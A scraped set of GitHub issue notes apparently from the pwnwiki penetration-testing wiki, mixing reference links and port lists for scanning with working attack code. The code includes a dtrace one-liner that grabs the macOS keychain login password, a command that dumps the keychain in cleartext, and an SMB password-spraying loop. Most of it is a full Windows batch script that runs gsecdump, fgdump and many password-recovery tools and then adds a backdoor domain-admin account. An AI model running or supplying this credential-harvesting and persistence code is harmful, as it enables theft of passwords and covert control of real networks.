pwnwiki / pwnwiki.github.io Goto Github PK

Scrape the content from https://gist.github.com/willurd/5720255

Source: http://blog.commandlinekungfu.com/p/index-of-tips-and-tricks.html

Take the content in the https://github.com/pwnwiki/pwnwiki.github.io/blob/master/2besorted/gdoc_osx.md file and move it to the appropriate categories/files.

http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf

http://www.exploit-db.com/wp-content/themes/exploit/docs/18229.pdf

Grab info on reverse shells from http://highon.coffee/blog/reverse-shell-cheat-sheet/

http://pauldotcom.com/wiki/index.php/Show_Notes

Don't have time to add this in the appropriate place:

sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)

Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt

Source: https://twitter.com/pentestcli

The "easy copy" lines need to be something some can copy paste into any tool that accepts comma separated ports (nmap/metasploit) of all the ports listed in its category.

Intent: Try to create a series of lists for scanning during a pentest (internal or externally). First for just discovery, then for authenticated access, then for pwnage, and finally just for curiosity.

==========================

All further edits should be done via the wiki on Github.
Thanks for everyone's help and feedback!

==========================


Discovery Ports:
 * easy copy - `21,22,23,25,139,443,445,631,3389,6000-6009,8080,8000,8443`
 * FTP: 21
 * SSH: 22
 * Telnet: 23
 * SMTP: 25
 * Finger: 7
 * HTTP: 80
 * Kerberos: 88
 * POP3: 110
 * SUNRPC (Unix RPC): 111 (think: rpcinfo)
 * NetBIOS: 139
 * IMAP 143
 * LDAP: 389
 * HTTPS: 443
 * LotusNotes: 1352
 * Microsoft DS: 445
 * RSH: 514
 * CUPS: 631
 * NFS: 2049
 * Webrick(Ruby Webserver): 3000
 * RDP: 3389
 * Munin: 4949 
 * SIP: 5060
 *PCAnywhere: 5631 (5632)
 * NRPE (*nix) /NSCLIENT++ (win): 5666 (evidence of Nagios server on network)
 * Alt-HTTP: 8080
 * Alt-HTTP tomcat: 9080
 * Another HTTP: 8000 (mezzanine in development mode for example)
 * Nessus HTTPS: 8834
 * Proxmox: 8006
 * Splunk: 8089 (also on 8000)
 * Alt HTTPS: 8443
 * vSphere: 9443
* X11: 6000-6009 (+1 to portnum for additional displays) (see xspy, xwd, xkey for exploitation)
* VNC: 5900, 5901+ (Same as X11; +1 to portnum for each user/dipslay over VNC. SPICE is usually in this range as well)
Printers: 9100, 515
 * Dropbox lansync: 17500


UDP Discovery:
 * easy copy - `53,123,161,1434`
 * DNS: 53
 * XDMCP: 177 (via NSE script --script broadcast-xdmcp-discover, discover nix boxes hosting X)
 * OpenVPN: 1194
 * MSSQL Ping: 1434
  * SUNRPC (Unix RPC): 111 (yeah, it's UDP, too)
 * SNMP 161
 * Network Time Protocol (NTP): 123 
 * syslog : 514
 * UPNP: 1900
* Isakmp - 500 (ike PSK Attack)
* vxworks debug: 17185 (udp)

Authentication Ports (other than ones already listed):
 * easy copy - `1494`
 * Citrix: 1494
 * WinRM: 80,5985 (HTTP), 5986 (HTTPS)
 * VMware Server: 8200, 902, 9084
 * DameWare: 6129

Easy-win Ports:

* Java RMI - 1099, 1098
* coldfusion default stand alone - 8500
* IPMI UDP(623) (easy crack or auth bypass)
* 6002, 7002 (sentinel license monitor (reverse dir traversal, sometimes as SYSTEM))
* GlassFish: 4848
* easy copy - `9060`
* IBM Web Sphere: 9060
* Webmin or BackupExec: 10000
* memcached: 11211
* DistCC: 3632
* SAP Router: 3299

Database Ports:

 * easy copy - `3306,1521-1527,5432,5433,1433,3050,3351,1583,8471,9471`
 * MySQL: 3306
 * PostgreSQL: 5432
 * PostgreSQL 9.2: 5433
 * Oracle TNS Listener: 1521-1527
 * Oracle XDB: 2100
 * MSSQL: 1433
 * Firebird / Interbase: 3050
 * PervasiveSQL: 3351, 1583
 * DB2/AS400 8471, 9471
 * Sybase 5000

SCADA / ICS:
(source: http://www.digitalbond.com/tools/the-rack/control-system-port-list/ )
* BACnet/IP: UDP/47808
* DNP3: TCP/20000, UDP/20000
* EtherCAT: UDP/34980
* Ethernet/IP: TCP/44818, UDP/2222, UDP/44818
* FL-net: UDP/55000 to 55003
* Foundation Fieldbus HSETCP/1089 to 1091, UDP/1089 to 1091
* ICCP: TCP/102
* Modbus TCP: TCP/502
* OPC UA Binary: Vendor Application Specific
* OPC UA Discovery Server: TCP/4840
* OPC UA XML: TCP/80, TCP/443
* PROFINET: TCP/34962 to 34964, UDP/34962 to 34964
* ROC PLus: TCP/UDP 4000

Interesting Port Ranges:

* HTTP(S) Ports: 8000-9000


Web easy-win URLs: (moved to: https://etherpad.mozilla.org/weburl-easywins )

awk '$2~/tcp$/' nmap-services | sort -r -k3 | head -n 1000 # same for udp

Content is here: http://resources.infosecinstitute.com/backdoor-sql-injection/

Move the content from the "cats" dir files (https://github.com/pwnwiki/pwnwiki.github.io/tree/master/2besorted/cats) into their appropriate categories.

https://www.trustedsec.com/uncategorized/powershell-reconnaissance/

Linux

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

I think we should have an entire page dedicated to netcat and the things you can do. I know that SANS (https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) has one. I bet we can get a bunch of other content for it too.

Got the link for this from: http://synjunkie.blogspot.com/2008/03/basic-dos-foo.html

::start of file
@echo off
::create the directory with a computer name for the system and move there
if not exist \switchblade\dump md \switchblade\dump >nul
if not exist \switchblade\dump%computername% md \switchblade\dump%computername% >nul
cd \switchblade\tools\ >nul
::create netdump.txt with all the information that the dos command net.exe will extract
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-net.log 2>&1
ipconfig /all >> \switchblade\dump%computername%%computername%-net.log 2>&1
route print >> \switchblade\dump%computername%%computername%-net.log 2>&1
ipconfig /displaydns >> \switchblade\dump%computername%%computername%-net.log 2>&1
netstat -anbv >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh diag show all /v >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh firewall show conf >> \switchblade\dump%computername%%computername%-net.log 2>&1
netsh firewall show port >> \switchblade\dump%computername%%computername%-net.log 2>&1
arp -a >> \switchblade\dump%computername%%computername%-net.log 2>&1
net session >> \switchblade\dump%computername%%computername%-net.log 2>&1
::user info creation
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-user.log 2>&1
net view >> \switchblade\dump%computername%%computername%-user.log 2>&1
net share >> \switchblade\dump%computername%%computername%-user.log 2>&1
net accounts >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net localgroup administrators /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "domain admins" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "backup operators" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
net group "domain users" /domain >> \switchblade\dump%computername%%computername%-user.log 2>&1
gpresult >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\whosthere.exe >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\whosthere-alt.exe >> \switchblade\dump%computername%%computername%-user.log 2>&1
.\gsecdump.exe -a >> \switchblade\dump%computername%%computername%-user 2>&1
::dump other PC info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%-PC.log 2>&1
net start >> \switchblade\dump%computername%%computername%-PC.log 2>&1
set >> \switchblade\dump%computername%%computername%-PC.log 2>&1
tree /f >> \switchblade\dump%computername%%computername%-PC.log 2>&1
::slurp Browser info
echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> \switchblade\dump%computername%%computername%_browser.log 2>&1
cscript //nologo .\iehistquick.vbs >> \switchblade\dump%computername%%computername%browser.log 2>&1
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" .\FirePassword.exe >> \switchblade\dump%computername%%computername%browser.log 2>&1
echo **********[End Of File]*********** >> \switchblade\dump%computername%%computername%_browser.log 2>&1
::create the nirsoft tools html files, some of them are known hacktools and will crash out script depends on your AV killer to run first
nircmd.exe exec2 hide "\switchblade\dump%computername%" "\switchblade\tools\fgdump.exe" -s -r -k
nircmd.exe execmd mylastsearch.exe /shtml "\switchblade\dump~$sys.computername$\InternetSearch.html"
nircmd.exe execmd pspv.exe /shtml "\switchblade\dump~$sys.computername$\IEPassword.html"
nircmd.exe execmd iepv.exe /shtml "\switchblade\dump~$sys.computername$\IEProtected.html"
nircmd.exe execmd nk2view.exe /shtml "\switchblade\dump~$sys.computername$\recentEmail.html"
nircmd.exe execmd recentfilesview.exe /shtml "\switchblade\dump~$sys.computername$\recentfiles.html"
IF EXIST "C:\Program Files\Mozilla Firefox\firefox.exe" nircmd.exe execmd passwordfox.exe /shtml "\switchblade\dump~$sys.computername$\FFPassword.html"
nircmd.exe execmd USBDeview.exe /shtml "\switchblade\dump~$sys.computername$\USB.html"
nircmd.exe execmd mspassSLURP.exe /shtml "\switchblade\dump~$sys.computername$\msn.html"
nircmd.exe execmd netpass.exe /shtml "\switchblade\dump~$sys.computername$\netpassword.html"
nircmd.exe execmd iehv.exe /shtml "\switchblade\dump~$sys.computername$\IEhistory.html"
nircmd.exe execmd ProduKey.exe /shtml "\switchblade\dump~$sys.computername$\keys.html"
nircmd.exe execmd MozillaHistoryView.exe /shtml "\switchblade\dump~$sys.computername$\FFXHistory.html"
nircmd.exe execmd WirelessKeyView.exe /shtml "\switchblade\dump~$sys.computername$\Wireless.html"
nircmd.exe execmd mailpv.exe /shtml "\switchblade\dump~$sys.computername$\mail.html"
nircmd.exe execmd mzcv.exe /shtml "\switchblade\dump~$sys.computername$\FFXCookie.html"
nircmd.exe execmd cports.exe /shtml "\switchblade\dump~$sys.computername$\OpenPorts.html"
nircmd.exe execmd chromepass.exe /shtml "\switchblade\dump~$sys.computername$\ChromePass.html"
nircmd.exe execmd chromecacheview.exe /shtml "\switchblade\dump~$sys.computername$\ChromePass.html"
nircmd.exe execmd OpenedFilesView.exe /shtml "\switchblade\dump~$sys.computername$\openfiles.html"
nircmd.exe execmd wul.exe /shtml "\switchblade\dump~$sys.computername$\updates-bugfixes.html"
nircmd.exe execmd dialupass2.exe /shtml "\switchblade\dump~$sys.computername$\DialUp2.html"
::finally if we didnt get caught
net user helpdeskadmin Password!@#$ /add
net localgroup Administrators helpdeskadmin /add
net group "domain admins" helpdeskadmin /add
exit

Now that scripts are allowed in the navigation.md lets look at moving the show/hide code up to it.

RE: https://github.com/Dynalon/mdwiki/releases/tag/0.6.1

Users may need to print out files from the pwnwiki site. HTML doesn't always play nice with print.Optimally there should a button or something that a user could click and get a pdf generated from a pwnwiki page.

Also, this will help to move people from using the google documents as an authoritative source.

Source: http://n0where.net/linux-post-exploitation/

Just thought of this whilst going though "AT is the New Black", but do we actually have any decent documentation on Mimikatz and WCE? If not it would be good to add in some good documentation on these two tools to our post exploitation for Windows section as they tend to come in handy on a pentest.

@for /F %n in (users_T.txt) DO @for /F %p in (pass.txt) DO @net use <servername>\IPC$ /user:%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use / delete <servername>IPC$ > NUL

the command runs but nothing shows on the screen...

Take the content in the https://github.com/pwnwiki/pwnwiki.github.io/blob/master/2besorted/gdoc_linux.md file and move it to the appropriate categories/files.

http://pwnwiki.io/#!presence/windows/network.md

lists net group /domain and net localgroup /domain as only working on a Windows Domain Controller. This is incorrect, should probably be only works on "Windows Domain"

http://www.garage4hackers.com/f56/

http://pentestmonkey.net/uncategorized/from-local-admin-to-domain-admin

https://github.com/nixawk/pentest-wiki

Add https://isc.sans.edu/forums/diary/No+Wireshark+No+TCPDump+No+Problem/19409/ to the pwnwiki

• https://sites.google.com/site/vjsmoreira/security/owa_user_enum
• https://sites.google.com/site/vjsmoreira/security/owa_user_enum/owa_user_enum.rb?attredirects=0
• https://www.redspin.com/it-security-blog/2009/08/attacking-webmail-user-accounts/
• http://www.irongeek.com/i.php?page=videos/derbycon4/t521-penetrate-your-owa-nate-power
• https://github.com/sensepost/ruler
• https://silentbreaksecurity.com/malicious-outlook-rules/
• http://www.blackhillsinfosec.com/?p=5465
• https://labs.mwrinfosecurity.com/blog/malicous-outlook-rules/
• https://dmitrysotnikov.wordpress.com/2008/05/08/execute-powershell-scripts-from-your-smartphone/
• https://github.com/mwrlabs/XRulez

Content from here: http://www.wordpress-secure.org/

The below repo is maintained by me. This repo is all tweets of @wincmdfu

https://github.com/madhuakula/wincmdfu

It contains many useful windows exploitation, post exploitation and other resources. Please let me know how can I add them to this repo.

Thanks,
Madhu Akula

This is the Google form that is advertised for people to submit their content to.

https://docs.google.com/spreadsheet/ccc?key=0AopazXmFTvF2dHVKQzNzeHVNMGRfZUxfc1BEZWtxdWc&usp=drive_web#gid=0

http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607